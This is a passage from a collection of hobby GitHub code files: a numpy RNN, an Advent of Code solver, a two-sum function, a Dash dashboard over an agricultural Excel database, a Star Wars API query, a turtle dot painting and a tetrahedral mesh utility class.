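        # hypothetical sketch of that rollout pattern (not the class's own
        # API; `step_fn` stands in for one RNN cell update):
        def _demo_rollout(step_fn, warmup_inputs, n_future, state=None):
            out = None
            for x in warmup_inputs:       # teacher-forced warm-up phase
                state, out = step_fn(x, state)
            preds = []
            for _ in range(n_future):     # autoregressive phase: out -> next x
                state, out = step_fn(out, state)
                preds.append(out)
            return preds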
self.output_length = output_length\r\n if self.output_start > self.input_length:\r\n Exception(\"Start of prediction > input_length!\")\r\n return\r\n self.output_mat = np.zeros((self.m, self.output_length))\r\n self.rnn_cells = [Rnn.RnnCell(self)] * (self.output_start+self.output_length)\r\n for i in np.arange(1, self.output_start+1, 1): # initialize input for training network\r\n self.rnn_cells[i].xt = np.reshape(self.input_mat[:, i-1], (self.p, 1))\r\n self.rnn_cells[i].st0 = self.u @ self.rnn_cells[i].xt + self.w @ self.rnn_cells[i-1].st\r\n self.rnn_cells[i].st = self.rnn_cells[i].tanh()\r\n\r\n # if i==2:\r\n # print(self.u, \"\\n\")\r\n # print(self.w, \"\\n\")\r\n # print(self.rnn_cells[i].xt, \"\\n\")\r\n # print(self.rnn_cells[i].st0)\r\n\r\n self.rnn_cells[self.output_start].ot0 = self.v @ self.rnn_cells[self.output_start].st\r\n self.rnn_cells[self.output_start].ot = self.rnn_cells[self.output_start].ot0\r\n self.output_mat[:, 0] = np.reshape(self.rnn_cells[self.output_start].ot, self.m)\r\n\r\n # print(self.rnn_cells[self.output_start].st)\r\n # print(self.rnn_cells[self.output_start].ot)\r\n\r\n for i in np.arange(self.output_start+1, self.output_start+self.output_length, 1):\r\n self.rnn_cells[i].xt = self.rnn_cells[i-1].ot\r\n\r\n # print(self.rnn_cells[i].st)\r\n\r\n self.rnn_cells[i].st0 = self.u @ self.rnn_cells[i].xt + self.w @ self.rnn_cells[i-1].st\r\n self.rnn_cells[i].st = self.rnn_cells[i].tanh()\r\n self.rnn_cells[i].ot0 = self.v @ self.rnn_cells[i].st\r\n self.rnn_cells[i].ot = self.rnn_cells[i].ot0\r\n\r\n # print(self.rnn_cells[i].ot)\r\n\r\n self.output_mat[:, i-self.output_start] = np.reshape(self.rnn_cells[i].ot, self.m)\r\n return self.output_mat\r\n\r\n\r\nif __name__ == '__main__':\r\n sin_data = np.sin(np.arange(0, 101, 0.8))\r\n cos_data = np.cos(np.arange(0, 101, 1))\r\n pow_data = np.arange(0, 101, 1) ** 2\r\n line_data = np.arange(0, 101, 1)\r\n pow_3_4_data = np.arange(0, 101, 1) ** 0.75\r\n sqrt_data = np.sqrt(np.arange(0, 101, 1))\r\n log_data = np.log(np.arange(1, 102, 1))\r\n con_data = np.ones(101)\r\n # dec_data = np.exp(-np.ones_like(np.arange(0, 101, 1))) * sin_data\r\n rnn = Rnn()\r\n rnn.train(line_data)\r\n # plt.plot(np.arange(0, np.size(sin_data), 1), sin_data)\r\n # fig1 = plt.plot(np.arange(0, np.size(rnn.losses), 1), rnn.losses)\r\n # print(rnn.u)\r\n # print(rnn.w)\r\n # print(rnn.v)\r\n # plt.show()\r\n output = np.reshape(rnn.predict(100, 3), 3)\r\n fig2 = plt.plot(np.arange(0, np.size(output), 1), output)\r\n print(np.sin(100))\r\n plt.show()\r\n pass\r\n","repo_name":"SunnyXia3579/Self-Made-RNN-GRU","sub_path":"RNN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12166,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"22917809336","text":"import time\nimport os\n\n\nclass Move:\n Rock = 1\n Paper = 2\n Scissors = 3\n\n Win = 6\n Loss = 0\n Draw = 3\n\n\nclass Round:\n def __init__(self, move1, move2, desired_result):\n self.p1_move = move1\n self.p2_move = move2\n if desired_result == Move.Draw:\n self.p2_move_pt2 = move1\n elif move1 == Move.Rock:\n self.p2_move_pt2 = Move.Paper if desired_result == Move.Win else Move.Scissors\n elif move1 == Move.Scissors:\n self.p2_move_pt2 = Move.Rock if desired_result == Move.Win else Move.Paper\n elif move1 == Move.Paper:\n self.p2_move_pt2 = Move.Scissors if desired_result == Move.Win else Move.Rock\n\n def get_round_score(self) -> (int, int):\n if self.p1_move == self.p2_move:\n return Move.Draw + 
self.p1_move, Move.Draw + self.p2_move\n\n winner = None\n # Ignore which player made the move in determining the winner to do less checks...\n moves = sorted([self.p1_move, self.p2_move])\n if moves[0] == Move.Rock and moves[1] == Move.Scissors:\n winner = 0\n elif moves[0] == Move.Rock and moves[1] == Move.Paper:\n winner = 1\n elif moves[0] == Move.Paper and moves[1] == Move.Scissors:\n winner = 1\n\n # Then correct for it if it's the opposite configuration\n if moves[0] != self.p1_move:\n moves.reverse()\n winner += 1\n winner %= 2\n\n return self.p1_move + (Move.Win if winner == 0 else Move.Loss), \\\n self.p2_move + (Move.Win if winner == 1 else Move.Loss)\n\n\ndef parse_input(filename: str):\n # I know r is the default but for some reason I just always explicitly specify it.\n rounds = []\n with open(filename, \"r\") as file:\n for line in file:\n line = line.strip().split(\" \")\n assert len(line) == 2, \"Good input should have 2 things per line\"\n STUFF = {\"A\": Move.Rock, \"X\": Move.Rock,\n \"B\": Move.Paper, \"Y\": Move.Paper,\n \"C\": Move.Scissors, \"Z\": Move.Scissors}\n STUFF2 = {\"X\": Move.Loss, \"Y\": Move.Draw, \"Z\": Move.Win}\n rounds.append(Round(STUFF[line[0]], STUFF[line[1]], STUFF2[line[1]]))\n\n return rounds\n\n\ndef main(input_filename: str):\n start_time = time.time()\n moves = parse_input(input_filename)\n\n part1_start = time.time()\n p1_score = 0\n p2_score = 0\n for move in moves:\n dp1, dp2 = move.get_round_score()\n p1_score += dp1\n p2_score += dp2\n\n part2_start = time.time()\n p1_score_pt2 = 0\n p2_score_pt2 = 0\n for move in moves:\n move.p2_move = move.p2_move_pt2\n dp1, dp2 = move.get_round_score()\n p1_score_pt2 += dp1\n p2_score_pt2 += dp2\n\n end_time = time.time()\n print(f\"Part 1: You scored {p2_score} points!\")\n print(f\" This {'beats' if p2_score > p1_score else 'does not beat'} the elf's {p1_score} points.\")\n print(f\"Part 2: You scored {p2_score_pt2} points!\")\n print(f\" This {'beats' if p2_score_pt2 > p1_score_pt2 else 'does not beat'} the elf's {p1_score_pt2} points.\")\n print(\"Elapsed Time:\")\n print(f\" Parsing: {(part1_start - start_time) * 1000:.2f} ms\")\n print(f\" Part 1: {(part2_start - part1_start) * 1000:.2f} ms\")\n print(f\" Part 2: {(end_time - part2_start) * 1000:.2f} ms\")\n print(f\" Total: {(end_time - start_time) * 1000:.2f} ms\")\n\n\nif __name__ == \"__main__\":\n def run_main():\n os.chdir(os.path.split(__file__)[0])\n main(\"../../inputs/2022/day02.txt\")\n\n\n run_main()\n","repo_name":"Dullstar/Advent_Of_Code","sub_path":"python/year2022/day02.py","file_name":"day02.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5431171202","text":"# Time: O(n)\n# Space: O(n)\n\n# Given an array of integers, return indices of the two numbers\n# such that they add up to a specific target.\n#\n# You may assume that each input would have exactly one solution.\n#\n# Example:\n# Given nums = [2, 7, 11, 15], target = 9,\n#\n# Because nums[0] + nums[1] = 2 + 7 = 9,\n# return [0, 1].\n\n\ndef twoSum(arr, target):\n \"\"\"\n If the target = x+y or y = target-x,\n If target = 1, and if we know x is 2, then y has to be -1 or (y = 1-2)\n if we know x is -3, then y has to be 4 or (y = 1-(-3)), ...\n In a dict, for every x we have seen, we store what y we are looking for i.e y = index of x.\n As we loop through, if we find that y in the array, we are done and we return index of x and index of y\n \"\"\"\n look_for = {}\n for 
i, x in enumerate( arr ):\n try:\n print('Find:', look_for[x], i)\n return look_for[x], i\n except KeyError:\n look_for.setdefault(target - x, i)\n\n\n\nprint(twoSum([2, 7, -1, 15, 1], 3))\n","repo_name":"manmax31/Algorithms","sub_path":"two-sum.py","file_name":"two-sum.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"35910358693","text":"# Import required libraries\nimport pickle\nimport copy\nimport pathlib\nimport dash\nimport dash_table\nimport math\nimport datetime as dt\nimport pandas as pd\nfrom dash.dependencies import Input, Output, State, ClientsideFunction\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objs as go\nimport io\nimport xlsxwriter\nimport flask\nfrom flask import send_file\nimport urllib\n\n\n# get relative data folder\nPATH = pathlib.Path(__file__).parent\n\napp = dash.Dash(\n __name__,\n)\n\nserver = app.server\n\n# Create global chart template\nmapbox_access_token = \"pk.eyJ1IjoiamFja2x1byIsImEiOiJjajNlcnh3MzEwMHZtMzNueGw3NWw5ZXF5In0.fk8k06T96Ml9CLGgKmk81w\"\n\n# Load data\ndf = pd.ExcelFile(PATH.joinpath(\"(4.21)Database for China Agricultural.xlsx\"))\nsheet_to_df_map = {}\navailable_indicators = []\n\nfor sheet_name in df.sheet_names:\n sheet_to_df_map[sheet_name] = df.parse(sheet_name)\n available_indicators.append(df.parse(sheet_name).columns[0])\n\ndef trim(df):\n trim_df = df.drop([df.index[-1]])\n trim_df = trim_df.set_index('Unnamed: 0')\n years = trim_df.columns.values\n\n trim_df_T = trim_df.transpose()\n\n info = {}\n years_options_list = []\n for i in years:\n try:\n info['label'] = int(i)\n except:\n info['label'] = i\n info['value'] = i\n years_options_list.append(info)\n info = {}\n return years, trim_df, trim_df_T, years_options_list\n\n\ndef trim2(df):\n trim_df = df.drop([df.index[-1]])\n trim_df = trim_df.set_index('Year')\n\n trim_df_T = trim_df.transpose()\n years = trim_df_T.columns.values\n\n info = {}\n years_options_list = []\n for i in years:\n if i <= 2100:\n try:\n info['label'] = int(i)\n except:\n info['label'] = i\n info['value'] = i\n years_options_list.append(info)\n info = {}\n return years, trim_df, trim_df_T, years_options_list\n\n\ndef trim3(df):\n trim_df = df.drop([df.index[-1]])\n trim_df = trim_df.drop([df.index[0]])\n trim_df = trim_df.set_index('Year')\n\n trim_df_T = trim_df.transpose()\n years = trim_df_T.columns.values\n\n info = {}\n years_options_list = []\n for i in years:\n if i <= 2100:\n try:\n info['label'] = int(i)\n except:\n info['label'] = i\n info['value'] = i\n years_options_list.append(info)\n info = {}\n return years, trim_df, trim_df_T, years_options_list\n\ninfo = {}\ntable_options_list = []\nfor i in range(len(available_indicators)):\n info['label'] = str(available_indicators[i].split(\":\")[1].replace(\"\\n\",\"\").replace(\"\\xa0\",\"\").replace(\"\\\\\",\" \" ))\n info['value'] = str(df.sheet_names[i])\n table_options_list.append(info)\n info = {}\n\n# for double headers\ntable_list1 = ['3.1.1a', '3.1.1b', '3.2.2', '3.2.4', '3.3.1', '3.3.2a',\n '3.3.2b', '3.3.2c', '3.3.2d', '3.3.2e', '3.4.2', ' 3.4.9', '3.4.11', ' 3.4.13', ' 3.4.16', '3.4.20']\n\n# for triple headers\ntable_list2 = [' 3.4.22', ' 3.5.1a', ' 3.5.1b', ' 3.5.2', '3. 
4.5b']\n\n######################################### MAIN APP #########################################\ndef generate_control_card():\n \"\"\"\n :return: A Div containing controls for graphs.\n \"\"\"\n return html.Div(\n id=\"control-card\",\n style={'margin': '10px'}, \n\n children=[\n html.Div([\n html.Div([\n html.H6('This is the Control panel of the database, you can qeury data you want here',id='des'),\n html.H6('Select country here',id='country-selector-text'),\n dcc.Dropdown(\n id='country-selector',\n options=[{'label': 'China', 'value': 'China'},{'label': 'Indonesia', 'value': 'Indonesia'}],\n value='China'\n ), \n ],\n ), \n ], className =\"row\"\n ),\n html.Div([\n html.Div([\n html.H6('Select table here',id='table-selector-text'),\n dcc.Dropdown(\n id='table-selector',\n options=table_options_list,\n value='3.1.1a'\n ), \n ],\n ), \n ], className =\"row\"\n ),\n\n html.Div(\n style={'padding-left': '20px'},\n children=[\n html.H6('Select year here',id='year-selector-text'),\n dcc.Dropdown(\n id='year-selector',\n style={'display': 'none'}\n ), \n html.Br(),\n # Export data\n html.Div(\n style={\"textAlign\": \"right\", \"padding-bottom\": \"20px\"},\n children=[\n\n html.A(html.Button('Export Data', id='download-button',\n style={\n \"background-color\": \"#0074e4\", \"color\": \"white\"},\n # style= {\"border-color\": \"#17a2b8\"},\n className=\"button\"),\n id='download-link', download=\"rawdata.csv\", href=\"\", target=\"_blank\")\n ]),\n ],\n ), \n ], className=\"row\"\n )\n\napp.layout = html.Div([\n html.Div(id=\"app-container\", children=[\n # Banner\n html.Div([html.H2(\n 'Database for Agriculture',\n id='title'\n ),\n ], style={\"textAlign\": \"left\"},\n className=\"banner\"\n ),\n\n # Left column\n html.Div([\n html.Div(\n # id=\"left-column\",\n children=[generate_control_card()],\n style={\"textAlign\": \"center\"}\n ), \n ], className = \"pretty_container four columns\"\n ),\n\n # datatable\n html.Div([ \n html.Div(\n [\n html.Div([\n dash_table.DataTable(\n id='table',\n style_table={'overflowX': 'auto',\n 'overflowY': 'auto',\n 'height': '400px',\n },\n style_cell={\n 'fontSize': 12,\n 'font-family': 'sans-serif',\n 'textAlign': 'left'\n },\n style_header={\n 'backgroundColor': 'white',\n 'fontWeight': 'bold'\n },\n sort_action='native',\n ),\n ], className = \"pretty_container one-third columns\"),\n ], className = \"row flex-display\"),\n ],\n ),\n\n\n html.Div([\n html.Div([\n dcc.Graph(\n id='pie-chart'\n )\n ], className = 'pretty_container one-third columns'),\n ]),\n\n html.Div([\n html.H6('Try clicking on the legend to isolate one trace of data',id='click'),\n ], className = 'pretty_container one-third columns'),\n\n html.Div([\n dcc.Graph(\n id='bar-chart'\n )\n ], className = \"pretty_container one-third columns\"),\n # bottom graph\n\n html.Div([\n dcc.Graph(\n id='line-chart'\n )\n ], className = \"pretty_container one-third columns\"),\n ]),\n])\n\n######################################### UPDATING FIGURES #########################################\n# callback for display year-selector or not\n@app.callback([Output('year-selector', 'style'), Output('year-selector', 'options')], [Input('table-selector', 'value')])\ndef update_years_option(selected_table):\n if selected_table in table_list1:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=2)\n selected_df = selected_df.fillna(9999)\n years, trim_selected_df, trim_selected_df_T, years_options_list = trim(\n 
selected_df)\n\n elif selected_table in table_list2:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=1)\n selected_df = selected_df.fillna(9999)\n years, trim_selected_df_T, trim_selected_df, years_options_list = trim3(\n selected_df)\n\n else:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=1)\n selected_df = selected_df.fillna(9999)\n years, trim_selected_df_T, trim_selected_df, years_options_list = trim2(\n selected_df)\n\n return {'display': 'block'}, years_options_list\n\n@app.callback(Output('year-selector', 'value'), [Input('year-selector', 'options')])\ndef set_years_value(available_options):\n return available_options[0]['value']\n\n# callback for datatable\n@app.callback([Output('table', 'data'), Output('table', 'columns')], [Input('table-selector', 'value')])\ndef updateTable(selected_table):\n if selected_table in table_list1:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=2)\n\n elif selected_table in table_list2:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=1)\n years, trim_selected_df_T, trim_selected_df, years_options_list = trim3(\n selected_df)\n\n else:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=1)\n selected_df = selected_df.drop(selected_df.index[-1])\n dt_col_param = []\n for col in selected_df.columns:\n dt_col_param.append({\"name\": str(col), \"id\": str(col)})\n\n return (selected_df.to_dict('records'), (dt_col_param))\n\n# Callback for csv download\n@app.callback(Output('download-link', 'href'), [Input('table-selector', 'value')])\ndef update_downloader(selected_table):\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=1)\n csvString = selected_df.to_csv(index=False, encoding='utf-8-sig')\n csvString = \"data:text/csv;charset=utf-8-sig,%EF%BB%BF\" + \\\n urllib.parse.quote(csvString)\n return csvString\n\n# callback for pie chart\n@app.callback(Output('pie-chart', 'figure'), [Input('year-selector', 'value'), Input('table-selector', 'value')])\ndef update_pie_chart(selected_year, selected_table):\n\n if selected_table in table_list1:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=2)\n years, trim_selected_df, trim_selected_df_T, years_options_list = trim(\n selected_df)\n\n else:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=1)\n years, trim_selected_df_T, trim_selected_df, years_options_list = trim2(\n selected_df)\n\n return {\n 'data': [go.Pie(\n labels=trim_selected_df_T.columns,\n values=trim_selected_df[selected_year].values.tolist(),\n marker={'colors': ['#EF963B', '#C93277', '#349600', '#EF533B', '#57D4F1', '#96D38C']})],\n 'layout': go.Layout(title=dict(text=f\"Yearly result on \"+str(selected_year),x=0.1),\n legend=dict(x=0.5, y=-0.2,\n font=dict(\n family=\"sans-serif\",\n size=10,\n color=\"black\"\n ),\n # bgcolor='LightSteelBlue',\n xanchor='center',\n orientation='h'\n ),\n margin={'l': 0, 'r': 0},\n autosize=True)}\n\n# callback for bar chart\n@app.callback(Output('bar-chart', 'figure'), 
[Input('table-selector', 'value')])\ndef update_bar_chart(selected_table):\n trace = []\n\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table)\n title = selected_df.columns[0].split(\":\")[1]\n\n if selected_table in table_list1:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=2)\n years, trim_selected_df, trim_selected_df_T, years_options_list = trim(\n selected_df)\n\n elif selected_table in table_list2:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=1)\n years, trim_selected_df_T, trim_selected_df, years_options_list = trim3(\n selected_df)\n\n else:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=1)\n years, trim_selected_df_T, trim_selected_df, years_options_list = trim2(\n selected_df)\n\n for i in range(len(years)):\n years[i] = str(years[i])[:4]\n\n for i in trim_selected_df_T.columns:\n trace.append(\n go.Bar(x=years, y=trim_selected_df_T[i].values.tolist(), name=i,))\n\n return {\n 'data': trace,\n 'layout': go.Layout(title=str(title), hovermode=\"closest\")}\n\n# callback for line chart\n@app.callback(Output('line-chart', 'figure'), [Input('table-selector', 'value')])\ndef update_line_chart(selected_table):\n trace = []\n\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table)\n title = selected_df.columns[0].split(\":\")[1]\n\n if selected_table in table_list1:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=2)\n years, trim_selected_df, trim_selected_df_T, years_options_list = trim(\n selected_df)\n\n else:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=1)\n years, trim_selected_df_T, trim_selected_df, years_options_list = trim2(\n selected_df)\n\n for i in range(len(years)):\n years[i] = str(years[i])[:4]\n\n for i in trim_selected_df_T.columns:\n trace.append(go.Scatter(\n x=years, y=trim_selected_df_T[i].values.tolist(), name=i, mode='lines',))\n\n return {\n 'data': trace,\n 'layout': go.Layout(title=str(title), colorway=['#fdae61', '#abd9e9', '#2c7bb6'])\n }\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"Tony19970430/dash-CSAM","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":15437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36289269482","text":"#!/usr/bin/env python3\n\"\"\" Where I am? 
\"\"\"\nimport requests\n\n\ndef sentientPlanets():\n \"\"\" returns the list of ships that can hold a\n given number of passengers\n\n If no ship available, return an empty list.\n \"\"\"\n\n url = \"https://swapi-api.hbtn.io/api/species/\"\n planets = []\n while url is not None:\n r = requests.get(url)\n results = r.json()[\"results\"]\n for specie in results:\n if (specie[\"designation\"] == \"sentient\" or\n specie[\"classification\"] == \"sentient\"):\n\n planet_url = specie[\"homeworld\"]\n if planet_url is not None:\n p = requests.get(planet_url).json()\n planets.append(p[\"name\"])\n url = r.json()[\"next\"]\n return planets\n","repo_name":"HeimerR/holbertonschool-machine_learning","sub_path":"pipeline/0x01-apis/1-sentience.py","file_name":"1-sentience.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9197052686","text":"# Day 18 Project: Draw a hirst-painting\nimport turtle as tk\nimport random\n# import colorgram\n#\n# rgb_colors = []\n# # Extracts colors form an image\n# colors = colorgram.extract(\"image.jpg\", 30)\n# # extract the rgb values and add to list\n# for color in colors:\n# r = color.rgb.r\n# g = color.rgb.g\n# b = color.rgb.b\n# new_color = (r, g, b)\n# rgb_colors.append(new_color)\n#\n# # print rgb tuples and copy it into a color_list\n# print(rgb_colors)\ncolor_list = [(241, 229, 79), (193, 10, 71), (208, 158, 97), (110, 179, 206), (163, 171, 33), (23, 118, 174), (162, 72, 35), (214, 137, 169), (30, 136, 73), (7, 35, 85), (234, 70, 40), (120, 182, 137), (239, 221, 4), (213, 83, 129), (80, 19, 80), (11, 58, 36), (238, 161, 190), (180, 44, 88), (10, 44, 127), (7, 102, 62), (120, 39, 23), (20, 168, 199), (6, 86, 97), (146, 208, 217), (161, 210, 186), (95, 38, 22)]\n\ntimmy = tk.Turtle()\ntk.colormode(255)\nscreen = tk.Screen()\ntimmy.penup()\ntimmy.setx(-screen.canvwidth)\ntimmy.sety(-screen.canvheight)\n\n\ndef draw_horizontal():\n for i in range(10):\n timmy.color(random.choice(color_list))\n timmy.pendown()\n timmy.dot(20)\n timmy.penup()\n timmy.forward(50)\n\n\nfor _ in range(5):\n draw_horizontal()\n timmy.left(90)\n timmy.forward(50)\n timmy.left(90)\n\n draw_horizontal()\n timmy.right(90)\n timmy.forward(50)\n timmy.right(90)\n\n\nscreen.exitonclick()\n","repo_name":"at-tawlib/100-days-of-code","sub_path":"day-018/hirst-painting/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"19490055244","text":"import numpy as np\nimport json\nimport os\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d.art3d import Line3DCollection\nfrom mpl_toolkits import mplot3d\nfrom .utils import ax3d_handle\n\nclass Mesh:\n def __init__(self):\n self.vertices = None # in meter\n self.tri_elements = None\n self.tet_elements = None\n self.fixed_vindex = None\n self.n_v = None\n self.n_tri = None\n self.n_tet = None\n\n self.x = None \n self.xp = None\n self.sp = None\n\n self.surf_vindex = None\n self.tri_line_segs = None\n self.tet_line_segs = None \n\n self.tri_ele = np.array([1,3,2,1,2,4,1,4,3,2,3,4]).reshape(-1,3)-1 #in outer normal vector order \n self.top_vtx = np.array([4,3,2,1])-1\n self.tri_line_comb = np.array([1, 2, 1, 3, 2, 3]).reshape(-1, 2) - 1\n self.tet_line_comb = np.array([1, 2, 1, 3, 1, 4, 2, 3, 2, 4, 3, 4]).reshape(-1, 2) - 1\n \n @staticmethod\n def lame_param(E, v):\n la = E * v / (1 + v) / (1 - 2 * v)\n mu = E / 2 / (1 
+ v)\n return la, mu\n '''\n basic self.XXX update\n 1. read_mesh_json\n 2. _get_ns\n 3. _handle_tri_elements\n 3.1 _update_tri_elements\n 3.2 _update_tri_tet\n 3.3 _update_tri_normal_vecs\n 3.4 _update_vtx_normal_vecs\n 4. _get_tet_line_segs \n 5. _get_tri_line_segs\n 6. _update_normal_vecs\n 7. update_normal_vecs\n '''\n def read_mesh_json(self, mesh_filename):\n mesh_file = os.path.join(os.path.dirname(os.path.abspath(__file__)),mesh_filename)\n with open(mesh_file, 'r') as file:\n liver_mat = json.load(file)\n for key, value in liver_mat.items():\n exec('self.' + key + '=np.array(value)')\n\n def _get_ns(self):\n self.n_v = self.vertices.shape[0]\n self.n_tri = self.tri_elements.shape[0]\n if self.tet_elements is not None:\n self.n_tet = self.tet_elements.shape[0]\n \n def _update_tri_elements(self):\n # find tri_elements order base on tet_elements \n self.tri_set = self.tet_elements[:,self.tri_ele].reshape(-1,3) # all the triangle, has repeating triangle\n temp = [tuple(row) for row in np.sort(self.tri_set,axis=1)]\n temp2,indices, counts = np.unique(temp,axis=0,return_index=True,return_counts=True)\n self.tri_elements = self.tri_set[indices[np.argwhere(counts==1)]].reshape(-1,3) \n\n def _update_tri_tet(self):\n # find the tri elements relationship to tet elements, [ n_tri x 2 ]\n tri_tet = np.zeros((self.tri_elements.shape[0],3)) \n i = 0\n for tri_ele in self.tri_elements:\n match_tet = np.argwhere((self.tri_set == tuple(tri_ele)).all(axis=1)).squeeze()\n tri_tet[i] = np.r_[match_tet//4,match_tet%4,self.top_vtx[match_tet%4]].astype(int) # ith tet elements, which face in tri_ele order\n i+=1\n self.tri_tet = tri_tet\n \n def _update_tri_normal_vecs(self,vertices):\n # find center points and the normal vector of each triangle element\n tri_vtx = vertices[self.tri_elements]\n self.tri_mid = tri_vtx.mean(axis=1)\n tri_normal_vec = np.cross(tri_vtx[:,1]-tri_vtx[:,0],tri_vtx[:,2]-tri_vtx[:,0])\n self.tri_normal_vec = tri_normal_vec*(1.0/np.linalg.norm(tri_normal_vec,axis=1))[:,np.newaxis] \n\n def _update_vtx_normal_vecs(self):\n # find vertices normal vector as sum of adjacent triangle elements\n if self.surf_vindex is None:\n self.surf_vindex = np.unique(self.tri_elements)\n vtx_normal_vec = [self.tri_normal_vec[\n np.argwhere(self.tri_elements==iv)[:,0]\n ].sum(axis=0) for iv in self.surf_vindex]\n # equal to\n # vtx_normal_vec = np.zeros((self.surf_vindex.size,3))\n # i = 0\n # for iv in self.surf_vindex:\n # iv_tri_index = np.argwhere(self.tri_elements==iv)[:,0]\n # iv_tri_nv = self.tri_normal_vec[iv_tri_index] \n # vtx_normal_vec[i] = iv_tri_nv.sum(axis=0)\n # i+=1\n self.vtx_normal_vec = vtx_normal_vec *(1/np.linalg.norm(vtx_normal_vec,axis=-1))[:,np.newaxis]\n \n def _handle_tri_elements(self,vertices):\n # vertices : self.vertices or self.x\n if self.tet_elements is not None:\n self._update_tri_elements()\n self._update_tri_tet() \n self._update_tri_normal_vecs(vertices)\n self._update_vtx_normal_vecs()\n self._get_ns()\n self._get_tri_line_segs()\n if self.tet_elements is not None:\n self._get_tet_line_segs()\n\n def _get_tet_line_segs(self):\n tet_line_segs = np.zeros((self.tet_line_comb.shape[0], self.n_tet, 2))\n for i in range(self.tet_line_comb.shape[0]): tet_line_segs[i] = self.tet_elements[:, self.tet_line_comb[i]]\n temp = [tuple(row) for row in np.sort(tet_line_segs.reshape(-1, 2), axis=1)]\n self.tet_line_segs = np.unique(temp, axis=0).astype(int)\n \n def _get_tri_line_segs(self):\n tri_line_segs = np.zeros((self.tri_line_comb.shape[0], self.n_tri, 2))\n for i in 
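The uniqueness trick in _update_tri_elements() above — a sorted face that occurs exactly once across all tetrahedra lies on the boundary — can be checked on a toy mesh. A standalone sketch with my own example data (not taken from the original file):

import numpy as np

tet_elements = np.array([[0, 1, 2, 3],
                         [1, 2, 3, 4]])  # two tets sharing the face {1, 2, 3}
tri_ele = np.array([1, 3, 2, 1, 2, 4, 1, 4, 3, 2, 3, 4]).reshape(-1, 3) - 1
faces = tet_elements[:, tri_ele].reshape(-1, 3)  # 8 faces; the shared one appears twice
_, idx, counts = np.unique(np.sort(faces, axis=1), axis=0,
                           return_index=True, return_counts=True)
surface = faces[idx[counts == 1]]
assert len(surface) == 6  # the interior face {1, 2, 3} drops out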
range(self.tri_line_comb.shape[0]): tri_line_segs[i] = self.tri_elements[:, self.tri_line_comb[i]]\n temp = [tuple(row) for row in np.sort(tri_line_segs.reshape(-1, 2), axis=1)]\n self.tri_line_segs = np.unique(temp, axis=0).astype(int)\n \n def _update_normal_vecs(self,vertices):\n self._update_tri_normal_vecs(vertices)\n self._update_vtx_normal_vecs()\n\n def update_normal_vecs(self):\n self._update_normal_vecs(self.x)\n '''\n plot function section\n \n 7. plt_tri_normal_vec # tri_mid: light purple, nv: dark purple\n 6. _plt_vtx_normal_vec # vtx: light pink, nv: dark pink \n 5. plt_vtx \n 4. plt_x\n 3. _plt_fixed_vtx # vtx: purple\n 2. _plt_ps_normal_vecs # tri_mid: light purple, nv: dark purple\n 1. _plt_msh # tet: blue , tri: green vtx:orange \n '''\n def _plt_ps_normal_vecs(self,base_ps,nvs,cp='#7D75FE',cnv='#1D1788',**kwargs):\n ax = ax3d_handle(**kwargs)\n if len(base_ps.shape) == 1: base_ps = base_ps.reshape(-1,3)\n if len(nvs.shape) == 1: nvs = np.matlib.repmat(nvs,base_ps.shape[0],1)\n ax.scatter(base_ps[:, 0], base_ps[:, 1], base_ps[:, 2], c=cp) \n ax.quiver(base_ps[:, 0], base_ps[:, 1], base_ps[:, 2],\n nvs[:, 0], nvs[:, 1], nvs[:, 2], color=cnv) \n return ax\n\n def plt_tri_normal_vec(self,vtx_scl=1,vec_scl=1,**kwargs):\n ax = ax3d_handle(**kwargs)\n ax = 